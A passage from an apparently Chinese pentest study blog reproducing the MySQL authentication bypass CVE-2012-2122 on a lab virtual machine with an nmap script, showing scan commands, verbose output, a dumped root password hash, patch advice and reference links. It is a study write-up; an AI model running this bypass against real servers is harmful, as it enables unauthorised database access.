Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [mysql]>

 4、nmap script(mysql-vuln-cve2012-2122):

root@kali:~# nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 192.168.118.130

Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:07 CST

Nmap scan report for bogon (192.168.118.130)

Host is up (0.00033s latency).

PORT     STATE SERVICE VERSION

3306/tcp open  mysql   MySQL 5.5.23

| mysql-vuln-cve2012-2122:

|   VULNERABLE:

|   Authentication bypass in MySQL servers.

|     State: VULNERABLE (Exploitable)

|     IDs:  CVE:CVE-2012-2122

|       When a user connects to MariaDB/MySQL, a token (SHA

|       over a password and a random scramble string) is calculated and compared

|       with the expected value. Because of incorrect casting, it might've

|       happened that the token and the expected value were considered equal,

|       even if the memcmp() returned a non-zero value. In this case

|       MySQL/MariaDB would think that the password is correct, even while it is

|       not.  Because the protocol uses random strings, the probability of

|       hitting this bug is about 1/256.

|       Which means, if one knows a user name to connect (and "root" almost

|       always exists), she can connect using *any* password by repeating

|       connection attempts. ~300 attempts takes only a fraction of second, so

|       basically account password protection is as good as nonexistent.

|

|     Disclosure date: 2012-06-9

|     Extra information:

|       Server granted access at iteration #1500

|

|     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

|

|     References:

|       http://seclists.org/oss-sec/2012/q2/493

|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

|_      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

MAC Address: 00:0C:29:25:90:3B (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

-d选项来查看debug信息,查看具体的信息如下:

root@kali:~# nmap -sV -T4 -p3306  -d  --script=mysql-vuln-cve2012-2122 192.168.118.130

Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:13 CST

--------------- Timing report ---------------

  hostgroups: min 1, max 100000

  rtt-timeouts: init 500, min 100, max 1250

  max-scan-delay: TCP 10, UDP 1000, SCTP 10

  parallelism: min 0, max 0

  max-retries: 6, host-timeout: 0

  min-rate: 0, max-rate: 0

---------------------------------------------

NSE: Using Lua 5.3.

NSE: Arguments from CLI:

NSE: Loaded 41 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 16:13

Completed NSE at 16:13, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 16:13

Completed NSE at 16:13, 0.00s elapsed

Initiating ARP Ping Scan at 16:13

Scanning 192.168.118.130 [1 port]

Packet capture filter (device eth0): arp and arp[18:4] = 0x000C29A8 and arp[22:2] = 0x84F5

Completed ARP Ping Scan at 16:13, 0.03s elapsed (1 total hosts)

Overall sending rates: 29.01 packets / s, 1218.42 bytes / s.

mass_rdns: Using DNS server 192.168.118.2

Initiating Parallel DNS resolution of 1 host. at 16:13

mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]

Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsed

DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]

Initiating SYN Stealth Scan at 16:13

Scanning bogon (192.168.118.130) [1 port]

Packet capture filter (device eth0): dst host 192.168.118.128 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.118.130)))

Discovered open port 3306/tcp on 192.168.118.130

Completed SYN Stealth Scan at 16:13, 0.04s elapsed (1 total ports)

Overall sending rates: 23.44 packets / s, 1031.36 bytes / s.

Initiating Service scan at 16:13

Scanning 1 service on bogon (192.168.118.130)

Completed Service scan at 16:13, 0.00s elapsed (1 service on 1 host)

NSE: Script scanning 192.168.118.130.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 16:13

NSE: Starting mysql-vuln-cve2012-2122 against 192.168.118.130:3306.

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #1

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #2

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #3

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #4

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #5

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #6

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #7

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #8

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #9

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #10

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #11

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #12

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #13

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #14

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #15

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #16

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #17

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #18

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #19

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #20

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #21

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #22

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #23

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #24

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #25

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #26

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #27

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #28

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #29

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #30

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #31

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #32

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #33

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #34

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #35

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #36

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #37

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #38

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #39

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #40

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #41

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #42

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #43

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #44

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #45

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #46

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #47

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #48

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #49

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #50

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #51

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #52

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #53

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #54

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #55

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #56

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #57

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #58

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #59

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #60

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #61

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #62

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #63

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #64

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #65

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #66

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #67

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #68

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #69

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #70

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #71

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #72

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #73

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #74

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #75

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #76

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #77

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #78

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #79

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #80

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #81

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #82

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #83

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #84

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #85

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #86

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #87

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #88

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #89

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #90

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #91

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #92

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #93

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #94

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #95

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #96

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #97

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #98

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #99

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #100

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #101

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #102

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #103

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #104

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #105

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #106

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #107

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #108

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #109

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #110

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #111

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #112

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #113

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #114

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #115

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #116

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #117

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #118

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #119

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #120

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #121

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #122

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #123

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #124

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #125

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #126

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #127

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #128

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #129

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #130

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #131

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #132

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #133

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #134

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #135

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #136

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #137

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #138

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #139

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #140

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #141

NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #142

NSE: Finished mysql-vuln-cve2012-2122 against 192.168.118.130:3306.

Completed NSE at 16:13, 0.42s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 16:13

Completed NSE at 16:13, 0.00s elapsed

Nmap scan report for bogon (192.168.118.130)

Host is up, received arp-response (0.00068s latency).

Scanned at 2018-08-29 16:13:26 CST for 1s

PORT     STATE SERVICE REASON         VERSION

3306/tcp open  mysql   syn-ack ttl 63 MySQL 5.5.23

| mysql-vuln-cve2012-2122:

|   VULNERABLE:

|   Authentication bypass in MySQL servers.

|     State: VULNERABLE (Exploitable)

|     IDs:  CVE:CVE-2012-2122

|       When a user connects to MariaDB/MySQL, a token (SHA

|       over a password and a random scramble string) is calculated and compared

|       with the expected value. Because of incorrect casting, it might've

|       happened that the token and the expected value were considered equal,

|       even if the memcmp() returned a non-zero value. In this case

|       MySQL/MariaDB would think that the password is correct, even while it is

|       not.  Because the protocol uses random strings, the probability of

|       hitting this bug is about 1/256.

|       Which means, if one knows a user name to connect (and "root" almost

|       always exists), she can connect using *any* password by repeating

|       connection attempts. ~300 attempts takes only a fraction of second, so

|       basically account password protection is as good as nonexistent.

|

|     Disclosure date: 2012-06-9

|     Extra information:

|       Server granted access at iteration #1500

|

|     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

|

|     References:

|       http://seclists.org/oss-sec/2012/q2/493

|       https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

MAC Address: 00:0C:29:25:90:3B (VMware)

Final times for host: srtt: 677 rttvar: 3967  to: 100000

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 16:13

Completed NSE at 16:13, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 16:13

Completed NSE at 16:13, 0.00s elapsed

Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-service-probes nmap-services.

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds

           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

root@kali:~#

四、漏洞修复建议

升级官方补丁: 
MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23  
MySQL 5.1.63, 5.5.24, 5.6.6 
Sebug临时解决办法:  
在防火墙上关闭mysql端口

参考:

http://www.freebuf.com/vuls/3815.html

http://blog.51cto.com/linuxgeek/998210

https://www.exploit-db.com/exploits/19092/

https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/

Next:

1、分析mysql源码  http://blog.51cto.com/linuxgeek/998210进一步的学习

2、分析nmap、metasploit脚本提高脚本编写能力

3、漏洞环境复现,目前在官方下载了对应有漏洞的mysql版本并安装在Windows下,但是并没有复现成功!

CVE-2012-2122-Mysql身份认证漏洞及利用的更多相关文章

  1. 2020/2/4 PHP代码审计之会话认证漏洞

    0x00 会话认证漏洞简介 会话认证是个非常大的话题,涉及各种协议和框架,如cookie.session.sso.oauth.openid等. 而其中最常使用的是Cookie和Session,他们都能 ...

  2. 小白日记36:kali渗透测试之Web渗透-手动漏洞挖掘(二)-突破身份认证,操作系统任意命令执行漏洞

    手动漏洞挖掘 ###################################################################################### 手动漏洞挖掘 ...

  3. Kali学习笔记30:身份认证与命令执行漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 实验环境: Kali机器:192.168.163.13 ...

  4. CVE-2020-17523:Apache Shiro身份认证绕过漏洞分析

    0x01 Apache Shiro Apache Shiro是一个强大且易用的Java安全框架,执行身份验证.授权.密码和会话管理. 0x02 漏洞简介 2021年2月1日,Apache Shiro官 ...

  5. .NET Web的身份认证

    百度一下”asp.net身份认证“,你会得到很多相关的资料,这些资料通常上来就会介绍诸如”Form认证“”Windows认证“等内容,而没有给出一个完整的流程.初学者对此往往一头雾水,我也曾经被坑过很 ...

  6. RESTful Api 身份认证安全性设计

    REST是一种软件架构风格.RESTful Api 是基于 HTTP 协议的 Api,是无状态传输.它的核心是将所有的 Api 都理解为一个网络资源.将所有的客户端和服务器的状态转移(动作)封装到 H ...

  7. asp.net身份认证

    在网上看到几篇比较好的文章很详细讲解了Form.Membership.以及Identity身份认证 Form身份认证: http://www.cnblogs.com/fish-li/archive/2 ...

  8. SQL Server 数据库身份认证以及包含数据库

    首先分为SQL Server 认证与Windows 身份认证. SQL Server 认证可以运行以下语句来查询 select * from sys.sql_logins 管理员可以直接修改密码,但无 ...

  9. Oracle MySQL Server 安全漏洞

    漏洞名称: Oracle MySQL Server 安全漏洞 CNNVD编号: CNNVD-201401-317 发布时间: 2014-01-22 更新时间: 2014-01-22 危害等级: 中危  ...

随机推荐

  1. Perl 子程序(函数)

    1.Perl 子程序(函数)Perl 子程序也就是用户定义的函数.Perl 子程序即执行一个特殊任务的一段分离的代码,它可以使减少重复代码且使程序易读. Perl 子程序可以出现在程序的任何地方,语法 ...

  2. Quartz_2_简单编程式任务调度使用(CronTrigger)

    第二个要介绍的任务调度器中的触发器是 CronTrigger ,相比较 SimpleTrigger 来说,CronTrigger 相对灵活,对于复杂的业务需求来说,更加的实用.要在使用 CronTri ...

  3. 35. Search Insert Position (Array; Divide-and-Conquer)

    Given a sorted array and a target value, return the index if the target is found. If not, return the ...

  4. Codeforces 712D DP

    题意:有2个人玩游戏,他们都有个初始值a和b, 游戏进行t轮, 每次可以选择加上一个[-k, +k]之间的数字,问有多少种方案a的和严格大于b的和. 思路:如果不考虑多于这个条件,只是询问有多少种方案 ...

  5. LoadRunner11学习记录七 -- 负载生成器、事务&集合点顺序、HTML&URL录制

    1.什么情况下用到负载生成器? 当需要使用多台测试机对同一服务器同时压力测试时,需要配置负载生成器. 2.LoadRunner中事务和集合点的放置顺序问题 1)事务放在集合点前面 这时事务的时间包含了 ...

  6. 清北学堂 day6 花

    1.花( flower.cpp/c/pas)[ 问题描述]商店里出售 n 种不同品种的花.为了装饰桌面,你打算买 m 支花回家.你觉得放两支一样的花很难看,因此每种品种的花最多买 1 支.求总共有几种 ...

  7. CSS3 圆环状进度条

    HTML: <div class="wrap"> <div class="progress-radial progress-25"> & ...

  8. VMware联网问题

    VMware 服务启动优化当虚拟机连不上网,或不显示ip时,先查看vm服务是否启动.控制台运行:services.msc 以下为改为手工启动:1.VMware 服务自动启动影响计算机启动速度,再此对V ...

  9. jstl中的日期格式化

    <% String strdate="2004/04/01";   Date a=new Date(strdate);   request.setAttribute(&quo ...

  10. .NET开源MSSQL、Redis监控产品Opserver之安全配置

    简介 Opserver是Stack Overflow的开源监控解决方案,由Stack Exchange发布,基于.NET框架构建.开源地址:https://github.com/opserver/Op ...